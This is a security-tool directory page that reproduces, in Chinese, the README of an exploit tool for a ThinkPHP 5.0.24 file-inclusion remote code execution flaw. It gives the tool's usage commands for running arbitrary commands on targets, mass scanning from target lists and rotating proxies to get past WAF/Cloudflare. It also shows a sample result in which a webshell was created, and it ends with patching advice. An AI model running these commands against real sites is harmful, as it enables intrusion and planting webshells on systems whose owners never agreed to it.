Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-63888-exploit — Security research tool for detecting and testing CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability) | Kitploit
工具/GitHubGitHub/an5i/cve-2025-63888-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Security research tool for detecting and testing CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability)

查看仓库
1045410个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-63888 ThinkPHP 5.0.24 文件包含远程代码执行漏洞利用工具

一个用于检测和测试 ThinkPHP 5.0.24 中 CVE-2025-63888 漏洞的安全研究工具,该漏洞允许通过文件包含攻击实现远程代码执行。

⚠️ 免责声明

此工具仅用于授权的安全测试和教育目的。未经授权访问计算机系统是违法的。请仅在您拥有所有权或已获得明确书面许可的系统上使用此工具。

📋 概述

CVE-2025-63888 是 ThinkPHP 5.0.24 中的一个严重远程代码执行漏洞。该漏洞存在于 thinkphp/library/think/template/driver/File.php 文件的 read 函数中,攻击者可通过操控 view() 函数中的模板路径,利用文件包含攻击执行任意代码。

CVSS 评分: 9.8(严重)
受影响版本: ThinkPHP 5.0.24(精确版本)
漏洞文件: thinkphp/library/think/template/driver/File.php
漏洞函数: read() 方法

🔍 功能特性

  • 自动 ThinkPHP 检测: 识别 ThinkPHP 安装及版本
  • 漏洞测试: 测试 CVE-2025-63888 文件包含漏洞
  • 端点发现: 自动查找易受攻击的端点
  • 文件包含利用: 演示文件包含能力
  • 日志文件投毒: 尝试污染日志文件以实现远程代码执行
  • Webshell 创建: 通过文件包含创建 webshell
  • 命令执行: 执行任意命令(仅限授权测试)
  • 多线程支持: 并行扫描多个目标
  • 代理支持: 绕过 WAF/Cloudflare 限制
  • JSON 导出: 以 JSON 格式输出详细结果

📦 安装

前提条件

  • Python 3.6 或更高版本
  • pip(Python 包管理器)

快速安装

# 克隆仓库
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# 安装依赖
pip install -r requirements.txt

# 使脚本可执行(可选)
chmod +x cve_2025_63888_exploit.py

替代方案:直接下载

# 下载脚本
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# 安装依赖
pip install requests

🚀 用法

基本用法

# 单个目标
python3 cve_2025_63888_exploit.py -u http://target.com

# 执行自定义命令
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# 从文件读取多个目标
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# 使用多线程加速扫描
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# 调试时输出详细信息
python3 cve_2025_63888_exploit.py -u http://target.com -v

使用代理

# 单个代理
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# 从文件读取多个代理
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

命令行选项

-u, --url          目标 URL
-f, --file         包含目标 URL 的文件(每行一个)
-c, --command      要执行的命令(默认:id)
-t, --threads      线程数(默认:1)
-o, --output       输出文件(默认:uknf_results.json)
-v, --verbose      启用详细日志
--proxy            代理 URL(例如 http://127.0.0.1:8080)
--proxy-list       包含代理 URL 的文件(每行一个)

📊 输出

脚本会生成一个包含详细结果的 JSON 文件:

{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 工作原理

  1. 检测阶段: 扫描 ThinkPHP 框架的指示特征
  2. 版本检测: 尝试识别 ThinkPHP 版本(5.0.24)
  3. 漏洞测试: 测试文件包含漏洞
  4. 端点发现: 使用 view() 函数查找易受攻击的端点
  5. 利用: 通过文件包含演示远程代码执行能力

🛡️ 缓解措施

如果您正在使用 ThinkPHP 5.0.24:

  1. 立即升级:

    • 更新至 ThinkPHP 5.0.25+ 或更高版本
    • 或升级至 ThinkPHP 6.x/7.x
  2. 实施路径验证:

    • 在 view() 函数中添加严格的路径验证
    • 阻止目录遍历字符(../、..)
    • 将模板路径限制在白名单目录内
  3. 代码级修复:

    • 在处理前验证模板路径
    • 使用 realpath() 确保文件位于允许的目录内
    • 实现函数白名单

📚 参考

  • CVE: CVE-2025-63888
  • GitHub Gist: CVE-2025-63888 详情
  • 语雀文章: 详细分析
  • ThinkPHP 手册: 官方文档

📖 示例

示例 1:单个目标扫描

python3 cve_2025_63888_exploit.py -u https://example.com

示例 2:多个目标并输出结果

# 创建目标文件
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# 运行扫描
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

示例 3:自定义命令执行

python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

示例 4:使用代理

# 单个代理
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# 从文件读取多个代理
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 贡献

欢迎贡献!请随时提交 Pull Request。

  1. Fork 该仓库
  2. 创建您的功能分支(git checkout -b feature/AmazingFeature)
  3. 提交您的更改(git commit -m 'Add some AmazingFeature')
  4. 推送到分支(git push origin feature/AmazingFeature)
  5. 打开一个 Pull Request

🐛 问题

如果您遇到任何问题或有建议,请在 GitHub 上提交 issue。

📝 许可证

本项目采用 MIT 许可证授权 - 详见 LICENSE 文件。

⭐ Star 历史

如果您觉得这个工具有用,请考虑在 GitHub 上给它一个 star!

⚖️ 法律声明

此工具仅供教育和授权安全测试之用。作者对因使用本程序造成的任何滥用或损害概不负责。用户有责任在测试任何系统之前确保已获得适当授权。

🙏 致谢

  • 原始漏洞报告者:Master-0-0
  • ThinkPHP 安全社区
  • 参与漏洞分析的安全研究人员

💰 捐赠

如果您觉得这个工具有用并希望支持该项目:

比特币(BTC):

bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

以太坊(ETH):

0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

感谢您的支持!🙏

下载工具